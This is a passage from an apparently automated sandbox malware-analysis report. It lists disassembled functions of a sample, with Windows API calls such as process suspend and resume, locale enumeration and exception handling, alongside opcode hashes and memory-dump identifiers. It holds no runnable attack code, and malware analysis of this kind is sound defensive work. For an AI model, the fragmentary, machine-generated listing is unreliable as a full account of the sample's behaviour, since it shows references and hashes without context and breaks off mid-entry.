                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 580307e7f9ed19ccdf9c10412063d8ea8bc62da0884c48fe7532ae208af4f440
                                                          • Instruction ID: c8bd48e99420b6c7b8697c64d03bd4ba31791432aa3bec6fd876c0c539ce8582
                                                          • Opcode Fuzzy Hash: 580307e7f9ed19ccdf9c10412063d8ea8bc62da0884c48fe7532ae208af4f440
                                                          • Instruction Fuzzy Hash: 7EE04F31000704AFEF016F10DD099493F29EF50396F448469F90896132CF79DC42CA48
                                                          Function 0041AECC Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041525B,00000000), ref: 0041AED7
                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041AEE4
                                                          • CloseHandle.KERNEL32(00000000,?,?,0041525B,00000000), ref: 0041AEED
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenSuspend
                                                          • String ID:
                                                          • API String ID: 1999457699-0
                                                          • Opcode ID: 3b5e723eaf058cf4912863f44fffedc3e3ae8a4bfc071aeb07fd662f2e304fa3
                                                          • Instruction ID: cbdad53ed629db76d40e0897fbdb217e77766e02faa6d5bf56048ccc5fb15ac5
                                                          • Opcode Fuzzy Hash: 3b5e723eaf058cf4912863f44fffedc3e3ae8a4bfc071aeb07fd662f2e304fa3
                                                          • Instruction Fuzzy Hash: 80D05E32500222638220176A7C0D997EE68DBC1AB2702416AF404D22219E30C88186A9
                                                          Function 0041AEF8 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415280,00000000), ref: 0041AF03
                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041AF10
                                                          • CloseHandle.KERNEL32(00000000,?,?,00415280,00000000), ref: 0041AF19
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenResume
                                                          • String ID:
                                                          • API String ID: 3614150671-0
                                                          • Opcode ID: 6d31317880465a65d63f867429a7c123c2a1788788c54349cbb6221ea43f3537
                                                          • Instruction ID: 5834692e6dbfc7302e0627ffd9745f57241b902771746b5adb28784224297b78
                                                          • Opcode Fuzzy Hash: 6d31317880465a65d63f867429a7c123c2a1788788c54349cbb6221ea43f3537
                                                          • Instruction Fuzzy Hash: 7CD05E32504121638220176A6C0D997ED68DBC5AB3702422AF504D22219E30C881C6A8
                                                          Function 0044D7F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
                                                          • API String ID: 0-248832578
                                                          • Opcode ID: 90d0b4729825bd90b6a9b0e481f721cabe6d10aefd9ef70f2d231800c5ca14c4
                                                          • Instruction ID: eafca5d3f29716c6c78e4e4ea3ad02361a474eaab44c7f235df41bcab4a95e78
                                                          • Opcode Fuzzy Hash: 90d0b4729825bd90b6a9b0e481f721cabe6d10aefd9ef70f2d231800c5ca14c4
                                                          • Instruction Fuzzy Hash: 3431F472D00249ABEB249E79CC85EFB7BBDDB85314F0401AEF419D7251E6349E418B54
                                                          Function 004477A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004477FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: GetLocaleInfoEx
                                                          • API String ID: 2299586839-2904428671
                                                          • Opcode ID: 6bd799bfac9af36fd133eb5d72b5b36b41e76e7aabeb18fd4f2c376b7933ddb9
                                                          • Instruction ID: 58a0a1dc03b065be57d87c6409a63545e464c60cfee5b8c381720ea1698dad41
                                                          • Opcode Fuzzy Hash: 6bd799bfac9af36fd133eb5d72b5b36b41e76e7aabeb18fd4f2c376b7933ddb9
                                                          • Instruction Fuzzy Hash: A0F0F631640318B7DB056F61CC06F6E7B64DB04712F10019AFC0467252CF75AB119A9D
                                                          Function 00441030 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49a3bfabf79a65c690f97e76fe456cb77f79ea6cd6c50daa38502d700b1f7d22
                                                          • Instruction ID: e2cf6eb340ac48f4c2d61266dea52d41f096047f3e1279b99095df37311d6468
                                                          • Opcode Fuzzy Hash: 49a3bfabf79a65c690f97e76fe456cb77f79ea6cd6c50daa38502d700b1f7d22
                                                          • Instruction Fuzzy Hash: 6A023D71E002199BEF14CFA9C9806AEB7F1FF48314F15826AD919E7354D734AE41CB94
                                                          Function 004522E2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004522DD,?,?,00000008,?,?,00455622,00000000), ref: 0045250F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: d07e5f888e39d313e61fc9618f59c4e8dd55f143eba3426c2705e6c45139c68f
                                                          • Instruction ID: f5116c66f7d103febd2a8608562706e5703b7900b8c4b7f838cfdcb30f3e5b5c
                                                          • Opcode Fuzzy Hash: d07e5f888e39d313e61fc9618f59c4e8dd55f143eba3426c2705e6c45139c68f
                                                          • Instruction Fuzzy Hash: A3B19D312106089FD714CF28C586B557BE0FF06366F29865AEC9ACF2A2C379D986CB44
                                                          Function 00432C54 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: b6bf49add14664c6f8016bf54831dc2d1fc9c90be302da46ea9abcdaf86f1ea8
                                                          • Instruction ID: 31134252bc459ed72560d692cedbd99cf1c15514e9e569b0755b2466d1e16266
                                                          • Opcode Fuzzy Hash: b6bf49add14664c6f8016bf54831dc2d1fc9c90be302da46ea9abcdaf86f1ea8
                                                          • Instruction Fuzzy Hash: 0B0285327083418BD714DF29D951B2EF3E1BFCC768F15892EF4899B381DA78A8058B85
                                                          Function 004512CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 0044712E
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045131E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                          • String ID:
                                                          • API String ID: 1663032902-0
                                                          • Opcode ID: bc85fdc09d4fce3dfbe50538f39d64f32c4b6099e2a05669c9b1daebb1f6e385
                                                          • Instruction ID: 0b21b5069fbf1db5bec531630a8d3eee6f1f474d64bb54c6a1c44a3d8e2cc721
                                                          • Opcode Fuzzy Hash: bc85fdc09d4fce3dfbe50538f39d64f32c4b6099e2a05669c9b1daebb1f6e385
                                                          • Instruction Fuzzy Hash: 2221D372501206ABEB24AB25CC61B7B77ACEB04316F10017BFD01D6663EB78AD49CB58
                                                          Function 00450F52 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • EnumSystemLocalesW.KERNEL32(0045107A,00000001,00000000,?,00443EFC,?,004516A7,00000000,?,?,?), ref: 00450FC4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID:
                                                          • API String ID: 1084509184-0
                                                          • Opcode ID: 2806d9e87b91580947c38d8a0617f63d2b95e775220bf3e675df36a013b02c7b
                                                          • Instruction ID: 451a354658792f2252a151bea30e2a99c0585190810680eeac5085bd3c0c80bb
                                                          • Opcode Fuzzy Hash: 2806d9e87b91580947c38d8a0617f63d2b95e775220bf3e675df36a013b02c7b
                                                          • Instruction Fuzzy Hash: FD11293B2007019FDB28AF39C8916BABB92FF8435AB14442DE94747B41D7B9B847C744
                                                          Function 004514FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451298,00000000,00000000,?), ref: 00451526
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                          • String ID:
                                                          • API String ID: 2692324296-0
                                                          • Opcode ID: e61a00dc03fcb481ae1f4eaad0348555d58099959c5ffac150b0217cf8aecc77
                                                          • Instruction ID: d2fe2c3fce417e68b0623dfb5eb434355baf81d8c10f12b7a8aa08190ad777f0
                                                          • Opcode Fuzzy Hash: e61a00dc03fcb481ae1f4eaad0348555d58099959c5ffac150b0217cf8aecc77
                                                          • Instruction Fuzzy Hash: 4AF0F9326102197BDB289A258C46BBB7758EB80755F04046AEC07A3251FA78FD45C6D4
                                                          Function 00450FED Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • EnumSystemLocalesW.KERNEL32(004512CA,00000001,?,?,00443EFC,?,0045166B,00443EFC,?,?,?,?,?,00443EFC,?,?), ref: 00451039
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID:
                                                          • API String ID: 1084509184-0
                                                          • Opcode ID: 1383e35cddf71846be5f04bfb451628eb58ff654fdb94fb85b79533aadb6d968
                                                          • Instruction ID: 969c50ee721750b2a7664082bdad3607fc28c6e2ba06475257799e5d9796a5a7
                                                          • Opcode Fuzzy Hash: 1383e35cddf71846be5f04bfb451628eb58ff654fdb94fb85b79533aadb6d968
                                                          • Instruction Fuzzy Hash: 19F028363003045FDB245F76DC81B7B7B95EF8075DF04442EFD4187A92D6B99C828604
                                                          Function 004472BE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00444CDC: EnterCriticalSection.KERNEL32(-00472558,?,0044246B,00000000,0046EAD0,0000000C,00442426,0000000A,?,?,00448949,0000000A,?,00447184,00000001,00000364), ref: 00444CEB
                                                          • EnumSystemLocalesW.KERNEL32(00447278,00000001,0046EC58,0000000C), ref: 004472F6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                          • String ID:
                                                          • API String ID: 1272433827-0
                                                          • Opcode ID: ce5d864c7127ce76761e0cbea026e968eb5e88cd2d94c9e55423b39c5525c7e8
                                                          • Instruction ID: acebf021cc54f47487df9b00313a15cc1bfd22b3d47c3c45ccbcf72c34342655
                                                          • Opcode Fuzzy Hash: ce5d864c7127ce76761e0cbea026e968eb5e88cd2d94c9e55423b39c5525c7e8
                                                          • Instruction Fuzzy Hash: 97F06236620200DFEB10EF79DE46B5D37E0EB44715F10816AF414DB2A1CBB89981DB4D
                                                          Function 00450F07 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • EnumSystemLocalesW.KERNEL32(00450E5E,00000001,?,?,?,004516C9,00443EFC,?,?,?,?,?,00443EFC,?,?,?), ref: 00450F3E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID:
                                                          • API String ID: 1084509184-0
                                                          • Opcode ID: c0752d91e59c0ec8caa35cedbb84099f1f2f8e555a7fabae98b3644acfac0ab5
                                                          • Instruction ID: 7585e2e2e927d60b614fbbb7cbec4ece609ea7599c31e6a5607aeddcbc8761df
                                                          • Opcode Fuzzy Hash: c0752d91e59c0ec8caa35cedbb84099f1f2f8e555a7fabae98b3644acfac0ab5
                                                          • Instruction Fuzzy Hash: 89F0E53A30020557CB28AF35D845B6A7F94EFC1715B16449EFE098B252C67AD886C794
                                                          Function 00433EE2 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00033EEE,00433BBC), ref: 00433EE7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: e588410f7d772084ad9b5e6a201b2d06307ba3208cc6e1757a1b1bd45e9a1e30
                                                          • Instruction ID: 9bcc487b38fe881941be7e97ad5738302595bcb4dafebc2e14986f4c0a09dd7d
                                                          • Opcode Fuzzy Hash: e588410f7d772084ad9b5e6a201b2d06307ba3208cc6e1757a1b1bd45e9a1e30
                                                          • Instruction Fuzzy Hash:
                                                          Function 0042707E Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                          • Instruction ID: 918b0ebc11a623be2c3a075c7dacafa9f372a23f1c3751216f0e188bc6ec1ae1
